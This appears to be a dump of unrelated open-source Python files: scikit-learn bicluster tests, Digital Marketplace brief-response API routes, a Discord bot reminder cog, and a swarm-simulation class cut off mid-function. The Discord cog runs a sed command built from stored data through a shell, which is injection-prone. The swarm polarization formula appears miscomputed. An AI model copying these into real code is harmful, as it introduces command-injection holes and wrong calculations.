    into _pos/_neg pairs, and applies *media* constraints when given.
    """
    prepared = load_metabolic_model(model, species)
    prepared.limitExchangeReactions(limit=exchange_limit)
    prepared.make_unidirectional()
    if media is not None:
        prepared.load_media(media)
    return prepared
| StarcoderdataPython |
9650463 | """Testing for bicluster metrics module"""
import numpy as np
from sklearn.utils._testing import assert_almost_equal
from sklearn.metrics.cluster._bicluster import _jaccard
from sklearn.metrics import consensus_score
def test_jaccard():
    """_jaccard against hand-computed values on small boolean masks."""
    a1 = np.array([True, True, False, False])
    a2 = np.array([True, True, True, True])
    a3 = np.array([False, True, True, False])
    a4 = np.array([False, False, True, True])
    # Each case compares the (a1, a1) bicluster against (other, other).
    cases = [(a1, 1), (a2, 0.25), (a3, 1.0 / 7), (a4, 0)]
    for other, expected in cases:
        assert _jaccard(a1, a1, other, other) == expected
def test_consensus_score():
    """consensus_score is 1 for matching biclusterings (up to ordering), 0 otherwise."""
    a = [[True, True, False, False],
         [False, False, True, True]]
    b = a[::-1]
    perfect_pairs = [((a, a), (a, a)), ((a, a), (b, b)),
                     ((a, b), (a, b)), ((a, b), (b, a))]
    disjoint_pairs = [((a, a), (b, a)), ((a, a), (a, b)),
                      ((b, b), (a, b)), ((b, b), (b, a))]
    for left, right in perfect_pairs:
        assert consensus_score(left, right) == 1
    for left, right in disjoint_pairs:
        assert consensus_score(left, right) == 0
def test_consensus_score_issue2445():
    """Regression test: A and B may contain different numbers of biclusters."""
    a_rows = np.array([[True, True, False, False],
                       [False, False, True, True],
                       [False, False, False, True]])
    # Column indicators mirror the row indicators for this fixture.
    a_cols = a_rows.copy()
    keep = [0, 2]
    # B keeps 2 of A's 3 biclusters, so the score should be 2/3.
    score = consensus_score((a_rows, a_cols), (a_rows[keep], a_cols[keep]))
    assert_almost_equal(score, 2.0/3.0)
| StarcoderdataPython |
9671090 | <reponame>uk-gov-mirror/alphagov.digitalmarketplace-api<gh_stars>10-100
from datetime import datetime
from dmutils.formats import DATE_FORMAT
from flask import abort, request, current_app
from sqlalchemy.exc import IntegrityError, DataError
from dmapiclient.audit import AuditTypes
from dmutils.config import convert_to_boolean
from .. import main
from ...models import db, Brief, BriefResponse, AuditEvent, Framework
from ...utils import (
get_int_or_400,
get_json_from_request,
get_request_page_questions,
get_valid_page_or_1,
json_has_required_keys,
list_result_response,
paginated_result_response,
single_result_response,
validate_and_return_updater_request,
)
from ...brief_utils import get_supplier_service_eligible_for_brief
from ...service_utils import validate_and_return_supplier
COMPLETED_BRIEF_RESPONSE_STATUSES = ['submitted', 'pending-awarded', 'awarded']
RESOURCE_NAME = "briefResponses"
@main.route('/brief-responses', methods=['POST'])
def create_brief_response():
    """Create a draft brief response for a supplier against a live brief.

    Validates the brief (exists, live, on a live/expired framework), the
    supplier's eligibility, and uniqueness (one response per supplier per
    brief), then persists the response together with an audit event in a
    single transaction.  Returns 201 with the new response; aborts 400 on
    any validation failure.
    """
    json_payload = get_json_from_request()
    updater_json = validate_and_return_updater_request()
    # Only the question fields on the submitted page are validated here.
    page_questions = get_request_page_questions()
    json_has_required_keys(json_payload, ['briefResponses'])
    brief_response_json = json_payload['briefResponses']
    json_has_required_keys(brief_response_json, ['briefId', 'supplierId'])
    try:
        brief = Brief.query.get(brief_response_json['briefId'])
    except DataError:
        # Non-integer IDs raise DataError at the DB layer; treat as not found.
        brief = None
    if brief is None:
        abort(400, "Invalid brief ID '{}'".format(brief_response_json['briefId']))
    if brief.status != 'live':
        abort(400, "Brief must be live")
    if brief.framework.status not in ['live', 'expired']:
        abort(400, "Brief framework must be live or expired")
    supplier = validate_and_return_supplier(brief_response_json)
    # The supplier's matching framework service, if eligible for this brief.
    brief_service = get_supplier_service_eligible_for_brief(supplier, brief)
    if not brief_service:
        abort(400, "Supplier is not eligible to apply to this brief")
    # Check if brief response already exists from this supplier
    if BriefResponse.query.filter(BriefResponse.supplier == supplier, BriefResponse.brief == brief).first():
        abort(400, "Brief response already exists for supplier '{}'".format(supplier.supplier_id))
    brief_response = BriefResponse(
        data=brief_response_json,
        supplier=supplier,
        brief=brief,
    )
    # Specialist briefs cap the day rate at the supplier's published maximum
    # for that role; other lots have no day-rate cap.
    brief_role = brief.data["specialistRole"] if brief.lot.slug == "digital-specialists" else None
    service_max_day_rate = brief_service.data[brief_role + "PriceMax"] if brief_role else None
    brief_response.validate(enforce_required=False, required_fields=page_questions, max_day_rate=service_max_day_rate)
    db.session.add(brief_response)
    try:
        # Flush (not commit) first so the response gets an id for the audit
        # event while keeping both inserts in one transaction.
        db.session.flush()
    except IntegrityError as e:
        db.session.rollback()
        # format(e) is equivalent to str(e) here.
        abort(400, format(e))
    audit = AuditEvent(
        audit_type=AuditTypes.create_brief_response,
        user=updater_json['updated_by'],
        data={
            'briefResponseId': brief_response.id,
            'briefResponseJson': brief_response_json,
            'supplierId': supplier.supplier_id,
        },
        db_object=brief_response,
    )
    db.session.add(audit)
    db.session.commit()
    return single_result_response(RESOURCE_NAME, brief_response), 201
@main.route('/brief-responses/<int:brief_response_id>', methods=['POST'])
def update_brief_response(brief_response_id):
    """Update a draft brief response's answers.

    Re-checks supplier eligibility and the brief/framework status on every
    update, applies the submitted fields, and records an audit event.
    Aborts 400 on validation failure, 404 if the response does not exist.
    """
    json_payload = get_json_from_request()
    updater_json = validate_and_return_updater_request()
    # Only the question fields on the submitted page are validated here.
    page_questions = get_request_page_questions()
    json_has_required_keys(json_payload, ['briefResponses'])
    brief_response_json = json_payload['briefResponses']
    brief_response = BriefResponse.query.filter(
        BriefResponse.id == brief_response_id
    ).first_or_404()
    brief = brief_response.brief
    supplier = brief_response.supplier
    # Eligibility may have changed since creation, so re-check it.
    brief_service = get_supplier_service_eligible_for_brief(supplier, brief)
    if not brief_service:
        abort(400, "Supplier is not eligible to apply to this brief")
    if brief.status != 'live':
        abort(400, "Brief must have 'live' status for the brief response to be updated")
    if brief.framework.status not in ['live', 'expired']:
        abort(400, "Brief framework must be live or expired")
    # Specialist briefs cap the day rate at the supplier's published maximum
    # for that role; other lots have no day-rate cap.
    brief_role = brief.data["specialistRole"] if brief.lot.slug == "digital-specialists" else None
    service_max_day_rate = brief_service.data[brief_role + "PriceMax"] if brief_role else None
    brief_response.update_from_json(brief_response_json)
    brief_response.validate(enforce_required=False, required_fields=page_questions, max_day_rate=service_max_day_rate)
    audit = AuditEvent(
        audit_type=AuditTypes.update_brief_response,
        user=updater_json['updated_by'],
        data={
            'briefResponseId': brief_response.id,
            'briefResponseData': brief_response_json,
            'supplierId': supplier.supplier_id,
        },
        db_object=brief_response,
    )
    db.session.add(brief_response)
    db.session.add(audit)
    try:
        db.session.commit()
    except IntegrityError as e:
        db.session.rollback()
        # format(e) is equivalent to str(e) here.
        abort(400, format(e))
    return single_result_response(RESOURCE_NAME, brief_response), 200
@main.route('/brief-responses/<int:brief_response_id>/submit', methods=['POST'])
def submit_brief_response(brief_response_id):
    """Submit a completed brief response.

    Runs full validation (all required fields enforced), stamps
    ``submitted_at`` with the current UTC time, and records an audit event.
    Aborts 400 on validation failure, 404 if the response does not exist.
    """
    updater_json = validate_and_return_updater_request()
    brief_response = BriefResponse.query.filter(
        BriefResponse.id == brief_response_id
    ).first_or_404()
    brief = brief_response.brief
    supplier = brief_response.supplier
    # Eligibility may have changed since creation, so re-check it.
    brief_service = get_supplier_service_eligible_for_brief(supplier, brief)
    if not brief_service:
        abort(400, "Supplier is not eligible to apply to this brief")
    if brief.status != 'live':
        abort(400, "Brief must have 'live' status for the brief response to be submitted")
    if brief.framework.status not in ['live', 'expired']:
        abort(400, "Brief framework must be live or expired")
    # Specialist briefs cap the day rate at the supplier's published maximum
    # for that role; other lots have no day-rate cap.
    brief_role = brief.data["specialistRole"] if brief.lot.slug == "digital-specialists" else None
    service_max_day_rate = brief_service.data[brief_role + "PriceMax"] if brief_role else None
    # Full validation: unlike create/update, all required fields must be set.
    brief_response.validate(max_day_rate=service_max_day_rate)
    brief_response.submitted_at = datetime.utcnow()
    audit = AuditEvent(
        audit_type=AuditTypes.submit_brief_response,
        user=updater_json['updated_by'],
        data={
            'briefResponseId': brief_response.id,
            'supplierId': supplier.supplier_id,
        },
        db_object=brief_response,
    )
    db.session.add(brief_response)
    db.session.add(audit)
    try:
        db.session.commit()
    except IntegrityError as e:
        db.session.rollback()
        # format(e) is equivalent to str(e) here.
        abort(400, format(e))
    return single_result_response(RESOURCE_NAME, brief_response), 200
@main.route('/brief-responses/<int:brief_response_id>', methods=['GET'])
def get_brief_response(brief_response_id):
    """Return a single brief response by id, or 404 when it does not exist."""
    response = BriefResponse.query.filter_by(
        id=brief_response_id
    ).first_or_404()
    return single_result_response(RESOURCE_NAME, response), 200
@main.route('/brief-responses', methods=['GET'])
def list_brief_responses():
    """List brief responses, filterable by supplier, brief, status, award date
    and framework.

    Defaults to the completed statuses when no ``status`` filter is given.
    Results are paginated unless filtered by brief or supplier, in which
    case the full list is returned.  ``with-data=false`` omits the response
    payloads from the serialisation.
    """
    page = get_valid_page_or_1()
    brief_id = get_int_or_400(request.args, 'brief_id')
    supplier_id = get_int_or_400(request.args, 'supplier_id')
    awarded_at = request.args.get('awarded_at')
    with_data = convert_to_boolean(request.args.get("with-data", "true"))
    if request.args.get('status'):
        statuses = request.args['status'].split(',')
    else:
        statuses = COMPLETED_BRIEF_RESPONSE_STATUSES
    brief_responses = BriefResponse.query.filter(BriefResponse.status.in_(statuses))
    if supplier_id is not None:
        brief_responses = brief_responses.filter(BriefResponse.supplier_id == supplier_id)
    if brief_id is not None:
        brief_responses = brief_responses.filter(BriefResponse.brief_id == brief_id)
    if awarded_at is not None:
        # Match the whole calendar day: [00:00:00, 23:59:59.999999].
        day_start = datetime.strptime(awarded_at, DATE_FORMAT)
        day_end = datetime(day_start.year, day_start.month, day_start.day, 23, 59, 59, 999999)
        # Inclusive date range filtering
        brief_responses = brief_responses.filter(BriefResponse.awarded_at.between(day_start, day_end))
    # Eager-load the relationships the serializer touches, while lazy-loading
    # everything else, to avoid per-row queries.
    brief_responses = brief_responses.options(
        db.defaultload(BriefResponse.brief).defaultload(Brief.framework).lazyload("*"),
        db.defaultload(BriefResponse.brief).defaultload(Brief.lot).lazyload("*"),
        db.defaultload(BriefResponse.brief).defaultload(Brief.awarded_brief_response).lazyload("*"),
        db.defaultload(BriefResponse.supplier).lazyload("*"),
    )
    if request.args.get('framework'):
        # Comma-separated framework slugs, whitespace-tolerant.
        brief_responses = brief_responses.join(BriefResponse.brief).join(Brief.framework).filter(
            Brief.framework.has(Framework.slug.in_(
                framework_slug.strip() for framework_slug in request.args["framework"].split(",")
            ))
        )
    serialize_kwargs = {"with_data": with_data}
    if brief_id or supplier_id:
        # Narrow filters: return the complete (unpaginated) list.
        return list_result_response(RESOURCE_NAME, brief_responses, serialize_kwargs=serialize_kwargs), 200
    return paginated_result_response(
        result_name=RESOURCE_NAME,
        results_query=brief_responses,
        serialize_kwargs=serialize_kwargs,
        page=page,
        per_page=current_app.config['DM_API_BRIEF_RESPONSES_PAGE_SIZE'],
        endpoint='.list_brief_responses',
        request_args=request.args
    ), 200
| StarcoderdataPython |
6704422 | <reponame>ev-ev/CS-Pound
import subprocess
import discord
from discord.ext import commands
from library import pound_countdown, mongodb_find
class AutoRemind:
    def __init__(self, bot):
        # Keep a reference to the running bot so the cog's commands can use it.
        self.bot = bot
@commands.command(aliases=['ar'])
@commands.guild_only() # Command can only be run in guilds
async def autoremind(self, ctx, args=''):
id_exists = await mongodb_find({'_id': str(ctx.author.id)}) # Get document of user
try:
id_exists = id_exists[0]
except IndexError:
pass
print(f'DOCUMENT: {id_exists}')
guild_roles = ctx.guild.roles # List of roles in guild
embed = discord.Embed()
for role in guild_roles: # For each role in the guild
if role.name == "CS Pound": # If 'CS Pound' role exists
permission = role.permissions.manage_roles # Check whether role has 'Manage Roles' permission and set boolean value
break # Break out of for loop
else: # If role doesn't exist
permission = False
if permission: # If bot has permission to 'Manage Roles'
guild_roles = ctx.guild.roles # List of roles in guild
for role in guild_roles: # Checks if role already exists in guild
if role.name == "Auto Remind": # If role exists
break # Break out of for loop
else: # If role doesn't exist
await ctx.guild.create_role(name='Auto Remind', reason='Auto Remind didn\'t exist') # Create 'Auto Remind' role in guild
if args == 'off' or args == 'cancel': # If user wants to turn off Auto Remind
if id_exists == '': # If user doesn't exist in database
embed = discord.Embed(title='Auto Remind', description='You don\'t have Auto Remind setup {0.mention}!'.format(ctx.message.author), colour=0xff5252) # Create embed
else: # If user exists
sed_statement = 'sed -i.bak ' + id_exists + 'd autoremind.txt' # sed statement
subprocess.Popen(sed_statement, shell=True) # Run sed statement
if permission: # If bot has permission to 'Manage Roles'
await ctx.author.remove_roles(discord.utils.get(guild_roles, name='Auto Remind'), reason='User disabled Auto Remind.') # Remove role from user
embed = discord.Embed(title='Auto Remind', description='You have been removed from the Auto Remind role.', colour=0x4ba139) # Create embed
else: # If bot doesn't have permission to 'Manage Roles'
embed = discord.Embed(title='Auto Remind', description='You have been removed from the Auto Remind.', colour=0x4ba139) # Create embed
else: # If user is setting an Auto Remind
valid = False
if args == '': # If no arguments provided
embed = discord.Embed(title='Auto Remind', description='You didn\'t input a time!', colour=0xff5252) # Create embed
elif args.isdigit(): # If the input is a digit
valid = True
else: # If the input isn't a digit
args = args[:-1] # Remove the minute marker
if args.isdigit(): # If the input is a digit now
valid = True
else: # If input is still not digit
embed = discord.Embed(title='Auto Remind', description='That is not a valid time!', colour=0xff5252) # Create embed
if valid: # If inputted time was valid
if int(args) > 60: # If time is bigger than 60 minutes
embed = discord.Embed(title='Auto Remind', description='That time is too far!', colour=0xff5252) # Create embed
else: # If time is less than 60 minutes
if id_exists != '': # If user has already set an Auto Remind
embed = discord.Embed(title='Auto Remind', description='You already have Auto Remind setup!'.format(ctx.message.author), colour=0xff5252) # Create embed
else: # If user doesn't have an Auto Remind setup
text = f'{ctx.message.guild.id} {ctx.message.channel.id} {ctx.message.author.id} {args}' + '\n' # Write in the format 'GUILD_ID CHANNEL_ID USER_ID REMIND_TIME'
with open('autoremind.txt', 'a+') as file: # Open autoremind.txt
file.write(text) # Write the text
if permission: # If bot has 'Manage Roles' permission
await ctx.author.add_roles(discord.utils.get(guild_roles, name='Auto Remind'), reason='User enabled Auto Remind.') # Add user to Auto Remind role
message = 'Will ping you ' + args + ' minutes before the pound opens!'
embed = discord.Embed(title='Auto Remind', description=message, colour=0x4ba139) # Create embed
await ctx.send(embed=embed) # Send embed
def setup(bot):
    """Extension entry point called by discord.py when the cog is loaded."""
    bot.add_cog(AutoRemind(bot))
    # Start the pound countdown background task alongside the cog.
    bot.loop.create_task(pound_countdown(bot))
| StarcoderdataPython |
8088028 | <reponame>AnnaMelk/spatial-visual-networks
import numpy as np
import itertools as it
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib.colorbar as colorbar
from matplotlib.patches import Ellipse,Polygon,FancyArrowPatch
import networkx as nx
import os
import shutil
from shapely import geometry
from shapely.geometry.polygon import LinearRing
class Swarm:
    '''#####################################################################
    This class calculates and stores all data on the swarm of ellipses.

    pos:        position of the eye of each ellipse (2xN array)
    pos_center: position of the center of each ellipse (2xN array)
    phi:        orientation of each ellipse (phi=0 towards pos. x-axis)
    w:          width of the ellipse, float
    l:          twice the offset of the eye on the ellipse main axis
                from the center, float (l=-1 back, l=1 front, l=0 center)
    n:          number of ellipses (just for convenience), int
    metric_distance_center: array of shape n*n, euclidean distance of
                            ellipse centers to one another
    tangent_pt_subj_pol: array of shape [2,n,n] containing the 2 tangent
                         points (as 2d arrays) for all combinations of
                         ellipses. Indices [i,j,k]:
                         i: 1st or 2nd tangent point
                         j: id of target (tps lie on this ellipse)
                         k: id of observer (this ellipse contains the eye)
                         entries are 2d arrays containing r, theta of the
                         tangent point in polar coordinates with the eye of
                         the observer in the origin and theta=0 on the
                         positive x-axis
    tangent_pt_obj_cart: array of shape [2,n,n] containing the 2 tangent
                         points (as 2d arrays) for all combinations of
                         ellipses. Indices [i,j,k]:
                         i: 1st or 2nd tangent point
                         j: target (tps lie on this ellipse)
                         k: observer (this ellipse contains the eye)
                         entries are 2d arrays containing x,y of the tangent
                         point in the objective cartesian coordinates (same
                         as used for pos)
    visual_angles: array (n*n) used to save the visual angle an individual i
                   would have in the visual field of individual j (second
                   index) if not obscured by any others
    #####################################################################'''
    def __init__(self,N=40,setup='grid',pos=None,pos_center=None,phi=None,w=0.4,l=0.,dist=2.,noise_pos=0.1,noise_phi=0.9,eliminate_overlaps=True):
        '''
        When an instance of swarm is initialized this sets:
        - pos: the position of the eye,
        - pos_center: position of the geometric center of each ellipse,
        - phi: orientations of the ellipses w.r.t. positive x-axis
        - w: width of the ellipses
        - l: half of the distance of the eye from the center along the
             main axis of the ellipse of length 1

        If positions and orientations are given, these are used to create the
        swarm and any input in N is ignored.
        If no pos and orient are given, they are generated for N ellipses
        according to the input parameters:
        - setup: string, options are 'grid','milling','hexagonal'; sets the
          basic geometry of the spatial configuration
        - dist: average distance between two grid-neighbors
        - noise_pos: float in [0,0.5], level of positional noise added to the
          basic geometric setup; noise is sampled from the uniform
          distribution [-noise_pos*dist, noise_pos*dist]
        - noise_phi: width parameter (concentration kappa) of the VonMises
          distribution that orientational noise is sampled from.
          High noise_phi corresponds to LOW orientational noise.
        '''
        self.w=w
        self.l=l
        if pos is None and pos_center is None and phi is None:
            #initiate positions and orientations according to N, dist, noise_phi, noise_pos and setup
            pos,phi=self._generate_initial_spatial_configuration(setup,N,noise_pos,dist,noise_phi,w)
            self.pos_center=pos
            # the eye sits l/2 ahead of the center along the heading direction
            self.pos=pos-np.array([-l/2.0*np.cos(phi),-l/2.0*np.sin(phi)])
            self.phi=phi
            self._reset_calculated_variables()
        else:
            # set positions and orientations according to input
            if pos_center is not None and pos is None:
                self.set_positions_and_orientations(pos_center,phi,center=True)
            elif pos_center is None and pos is not None:
                self.set_positions_and_orientations(pos,phi,center=False)
            else:
                # NOTE(review): on this branch self.n is never set, so the
                # check below raises AttributeError -- confirm intended.
                print('Either pos or pos_center needs to be set. If you intend to generate positions, do NOT set either pos or pos_center or phi.')
        if eliminate_overlaps and self.n>1:
            ok_to_continue=self._eliminate_overlaps()
        else:
            ok_to_continue=True
        if ok_to_continue==False:
            print('Overlaps could not be removed successfully. Please try again.')
def polarization(self):
polarization=np.sqrt(np.sum(np.sin(self.phi))**2+np.sum(np.cos(self.phi)**2))/self.n
return polarization
def density(self):
if np.sum(self.metric_distance_center)==0:
self._calc_metric_distances()
third_nearest_neighbor_distance = np.sort(self.metric_distance_center,axis=0)[2]
return 4./(np.pi*np.mean(third_nearest_neighbor_distance)**2)
    def _calc_visual_fields(self):
        '''Calculates the visual field of all ellipses.

        Results are stored on the instance (self.visual_field,
        self.angular_area, tangent point arrays); nothing is returned.
        NOTE(review): the original docstring claimed a 1/0 return value,
        but no value is ever returned.
        '''
        # Pairwise distances are a prerequisite for the tangent points.
        if np.sum(self.metric_distance_center)==0:
            self._calc_metric_distances()
        self._calc_tangent_pts()
        self._calc_vis_field_and_ang_area()
def binary_visual_network(self,threshold=0.,return_networkX=False):
if np.sum(self.angular_area)==0:
self._calc_visual_fields()
adjacency_matrix=np.array(self.angular_area>threshold,dtype=int)
if return_networkX:
return [adjacency_matrix,self._create_network_graph(adjacency_matrix)]
else:
return adjacency_matrix
def binary_metric_network(self,threshold=5.,return_networkX=False):
if np.sum(self.metric_distance_center)==0:
self._calc_metric_distances()
adjacency_matrix=np.array(np.nan_to_num(self.metric_distance_center,nan=np.inf)<threshold,dtype=int)
if return_networkX:
return [adjacency_matrix,self._create_network_graph(adjacency_matrix)]
else:
return adjacency_matrix
def binary_topological_network(self,threshold=5,return_networkX=False):
if np.sum(self.metric_distance_center)==0:
self._calc_metric_distances()
adjacency_matrix=np.array(np.argsort(np.argsort(self.metric_distance_center,axis=0),axis=0)<threshold,dtype=int)
if return_networkX:
return [adjacency_matrix,self._create_network_graph(adjacency_matrix)]
else:
return adjacency_matrix
    def set_positions_and_orientations(self,pos,phi,center=False):
        '''
        Sets the positions of ellipse centers (center=True) or eyes
        (center=False) as well as orientations, and resets any measures
        previously derived from these quantities.

        INPUT:
        pos:    numpy array of dimension 2xN or Nx2
        phi:    numpy array or list of length N
        center: boolean

        NOTE(review): if the phi length check fails, pos/pos_center are
        already partially updated and _reset_calculated_variables() still
        runs with the stale self.phi -- confirm this is acceptable.
        '''
        l=self.l
        if np.shape(pos)[0]!=2:
            if np.shape(pos)[1]==2:
                # accept Nx2 input by transposing to the internal 2xN layout
                pos=pos.T
            else:
                print('positions need to be of shape [2,N] or ([N,2]')
                return
        if center:
            pos_center=pos
            self.pos_center=pos_center
            if np.shape(phi)==(np.shape(self.pos_center)[1],):
                # eye sits l/2 ahead of the center along the heading
                self.pos=self.pos_center-np.array([-l/2.0*np.cos(phi),-l/2.0*np.sin(phi)])
                self.phi=phi
            else:
                print('Length of orientations array must correspond to number of given positions')
        else:
            self.pos=pos
            if np.shape(phi)==(np.shape(pos)[1],):
                self.pos_center=self.pos+np.array([-l/2.0*np.cos(phi),-l/2.0*np.sin(phi)])
                self.phi=phi
            else:
                print('Length of orientations array must correspond to number of given positions')
        self._reset_calculated_variables()
    def _generate_initial_spatial_configuration(self,state,nn,noise_int,d,kappa,w):
        """Generate nn positions and orientations on a 'grid', 'hexagonal'
        or 'milling' layout.

        Positional noise is uniform in [-noise_int*d, noise_int*d]; the
        orientation noise is von Mises with concentration kappa.
        Returns (pos, orientations) with pos of shape (2, nn), or None
        (implicitly) for an unknown `state`.
        """
        if state=='grid':
            # square grid of side n; leftover individuals are appended
            # column by column to the right of the grid
            n=int(np.floor(np.sqrt(nn)))
            xlen=n
            ylen=n
            number=n*n
            grid_x=np.linspace(d,d*xlen,xlen,endpoint=True)
            grid_y=np.linspace(d,d*ylen,ylen,endpoint=True)
            x,y=np.meshgrid(grid_x,grid_y)
            pos=np.array([x.flatten(),y.flatten()])
            if n<np.sqrt(nn):
                for i in range(nn-number):
                    extra=np.array([d*(xlen+1+np.floor(i/n)),d*(i%n+1)]).reshape(2,1)
                    pos=np.hstack([pos,extra])
            orientations=np.random.vonmises(0.0,kappa,nn)
            noise=(np.random.random((2,nn))-np.ones((2,nn))*0.5)*2.0*noise_int*d
            pos=pos+noise
            return pos,orientations
        elif state=='hexagonal':
            # like 'grid' but rows are compressed by sqrt(2) in y and every
            # second row is shifted by d/2 to give a hexagonal packing
            d_y=d/np.sqrt(2.)
            n=int(np.floor(np.sqrt(nn)))
            xlen=n
            ylen=n
            number=n*n
            grid_x=np.linspace(d,d*xlen,xlen,endpoint=True)
            grid_y=np.linspace(d_y,d_y*ylen,ylen,endpoint=True)
            x,y=np.meshgrid(grid_x,grid_y)
            x[0:-1:2]+=d/2.
            pos=np.array([x.flatten(),y.flatten()])
            if n<np.sqrt(nn):
                for i in range(nn-number):
                    extra=np.array([d*(xlen+1+np.floor(i/n)),d_y*(i%n+1)]).reshape(2,1)
                    pos=np.hstack([pos,extra])
            orientations=np.random.vonmises(0.0,kappa,nn)
            noise_x=(np.random.random((nn))-np.ones((nn))*0.5)*2.0*noise_int*d
            noise_y=(np.random.random((nn))-np.ones((nn))*0.5)*2.0*noise_int*d_y
            pos[0]+=noise_x
            pos[1]+=noise_y
            return pos,orientations
        elif state=='milling':
            # concentric rings, each populated so neighbors are about d apart;
            # headings are tangential (theta - pi/2) plus von Mises noise
            lower, upper = _numberofrings(nn)
            radius=(1.0/2.0+np.arange(upper))*d
            population=np.floor((radius*2.0*np.pi)/d).astype(int)
            totalnumber=np.cumsum(population)
            nr_rings=np.amin(np.where(totalnumber>=nn))+1
            radius=(1./2.+np.arange(nr_rings))*d
            population=np.floor((radius*2.*np.pi)/d).astype(int)
            # the outermost ring absorbs the remainder
            population[-1]=nn-np.sum(population[:-1])
            distance=2*np.pi*radius/population
            offset=(nr_rings+1)*d
            xpos=[]
            ypos=[]
            orientations=[]
            for i in np.arange(nr_rings):
                theta=2*np.pi*np.linspace(0,1,population[i],endpoint=False)+((np.random.random(population[i])-np.ones(population[i])*0.5)*2.0*noise_int*d)/radius[i]
                orientations.append(theta-np.pi/2.0*np.ones(population[i])+np.random.vonmises(0.0,kappa,population[i]))
                xpos.append(radius[i]*np.cos(theta)+offset)
                ypos.append(radius[i]*np.sin(theta)+offset)
            xpos=np.concatenate(xpos)
            ypos=np.concatenate(ypos)
            orientations=np.concatenate(orientations)
            orientations=_cast_to_pm_pi(orientations)
            return np.array([xpos,ypos]),orientations
        else:
            print("state needs to be either milling or grid or hexagonal")
def _reset_calculated_variables(self):
''' Resets all the variables of swarm that are calculated from the original
input of positions, orientations, ellipse width w and eye position l
'''
self.n=len(self.phi)
self.metric_distance_center=np.zeros([self.n,self.n])
self.tangent_pt_subj_pol=np.zeros([2,self.n,self.n])
self.tangent_pt_obj_cart=np.zeros([2,self.n,self.n])
self.angular_area=np.zeros([self.n,self.n])
self.network=nx.DiGraph()
self.visual_angles=np.zeros([self.n,self.n])
self.eyeinside=()
self.visual_field=np.zeros([self.n,self.n,(self.n-1)*2])
def _eliminate_overlaps(self):
overlaps_exist=self._check_for_overlaps()
if overlaps_exist:
print('moving ellipses to get rid of intersections')
self._reposition_to_eliminate_overlaps()
overlaps_removed_successfully = not self._check_for_overlaps()
return overlaps_removed_successfully
def _calc_metric_distances(self):
'''
calculates the euclidean distance between all
the geometric centers of the ellipses, accessible
via self.metric_distance_center
'''
z_center=np.array([[complex(p[0],p[1]) for p in self.pos_center.T]])
self.metric_distance_center=abs(z_center.T-z_center)
def _check_for_overlaps(self):
overlaps_exist=False
# if any two ellipses are closer than 1 bodylength from each other
if np.sum(self.metric_distance_center<1.):
potential_overlaps=np.array([np.array([a,b]) for a in range(self.n)
for b in range(a) if self.metric_distance_center[a,b]<1.]).T
i=0
while i in range(len(potential_overlaps[0])):
id_1=potential_overlaps[0,i]
id_2=potential_overlaps[1,i]
if self._check_ellipse_pair_for_overlap(id_1,id_2):
overlaps_exist=True
i=np.inf
i+=1
return overlaps_exist
def _check_ellipse_pair_for_overlap(self,id1,id2):
'''determines if ellipse with id1 and ellipse with id2 are intersecting '''
phi1=self.phi[id1]
phi2=self.phi[id2]
pos1=self.pos_center[:,id1]
pos2=self.pos_center[:,id2]
w=self.w
pos1_eye=self.pos[:,id1]
pos2_eye=self.pos[:,id2]
ellipses = [(pos1[0], pos1[1], 1, w/2.0, phi1), (pos2[0], pos2[1], 1, w/2.0, phi2)]
ellipse_a, ellipse_b =_ellipse_polyline(ellipses)
are_intersecting = _intersections(ellipse_a,ellipse_b)
return are_intersecting
    def _reposition_to_eliminate_overlaps(self,fileName='random',lamda1=0.05, overdamp=0.5):
        '''This function uses C++-code to shift and turn the ellipses
        such that they don't intersect anymore; positions and
        orientations are exchanged via temporary txt files.
        - lamda1 - coefficient of the repulsion area of the cells (their main body) (0.01 - 0.05)
        - overdamp - coefficient that controls cell inertia (0 - 1).

        NOTE(review): assumes the external binary
        ./Palachanis2015_particle_system/build/pS exists and writes its
        result files with the exact names loaded below -- confirm on the
        deployment machine.'''
        # save the current position data to file to be read by C-code
        if fileName=='random':
            fileName=str(int(np.random.random()*1000000))
        outpath='./position_orientation_data_tmp/'+fileName
        if not os.path.exists(outpath):
            os.makedirs(outpath)
        pospath=outpath+'_pos.txt'
        headingpath=outpath+'_phi.txt'
        np.savetxt(pospath,self.pos_center.T,fmt='%1.8f')
        np.savetxt(headingpath,self.phi,fmt='%1.8f')
        resultpath=outpath
        # execute the C-code
        command="LD_LIBRARY_PATH=$HOME/lib ./Palachanis2015_particle_system/build/pS 50000 {} {} {} {} {} {} {} {} 1.06 1. 0.".format(180,
            self.n,(self.w+0.06)/1.06,lamda1,overdamp,pospath,headingpath,resultpath)
        os.system(command)
        #load corrected positions and orientations from C-code output
        new_pos=np.loadtxt(resultpath+'/pos_d1.000_w%1.2f_bl1.1.txt'%((self.w+0.06)/1.06))
        hxhy=np.loadtxt(resultpath+'/headings_d1.000_w%1.2f_bl1.1.txt'%((self.w+0.06)/1.06))
        new_phi=np.arctan2(hxhy[:,1],hxhy[:,0])
        #set the new positions and orientations
        self.set_positions_and_orientations(new_pos,new_phi,center=True)
        # remove the tmp files
        shutil.rmtree(resultpath)
        os.remove(pospath)
        os.remove(headingpath)
    def _calc_tangent_pts(self,check_intersects=True):
        ''' Calculates the tangent points of all ellipse pairs.
        The result can be found in
        - self.tangent_pt_subj_pol (in polar coordinates
          centered at a certain individual)
        - self.tangent_pt_obj_cart (in cartesian coordinates,
          same origin as self.pos)

        Side effect: the diagonals of self.metric_distance_center and of
        the local distance matrix are set to NaN to avoid spurious
        self-tangents.
        NOTE(review): the parameter check_intersects is unused.
        '''
        #initialize lists to collect the calculated tangent points (tp)
        tp_subj_pol=[]
        tp_obj_cart=[]
        # rename some variables for convenience
        w=self.w
        phi_m=np.array([self.phi,]*self.n).transpose()
        x=self.pos[0]
        y=self.pos[1]
        x_center=self.pos_center[0]
        y_center=self.pos_center[1]
        # calculate the relative positions of i to j in coordinate
        # system with origin in the eye of j
        rel_x=x_center.reshape(len(x_center),1)-x #entry(ij)=pos(i)-pos(j)
        rel_y=y_center.reshape(len(y_center),1)-y
        theta=np.arctan2(rel_y,rel_x)
        z=np.array([[complex(p[0],p[1]) for p in self.pos.T]])
        z_center=np.array([[complex(p[0],p[1]) for p in self.pos_center.T]])
        r=abs(z_center.T-z)
        #indices ij: abs(z_center(i)-z(j)), j is observer, i target
        #to avoid errors in further calc. result for these will be set manually
        np.fill_diagonal(self.metric_distance_center,float('NaN'))
        np.fill_diagonal(r,float("NaN"))
        # calculate tangent points' parameter psi in parametric ellipse eq.
        psi=_get_tangent_point_parameter(w,r,theta,phi_m)
        for p in psi:
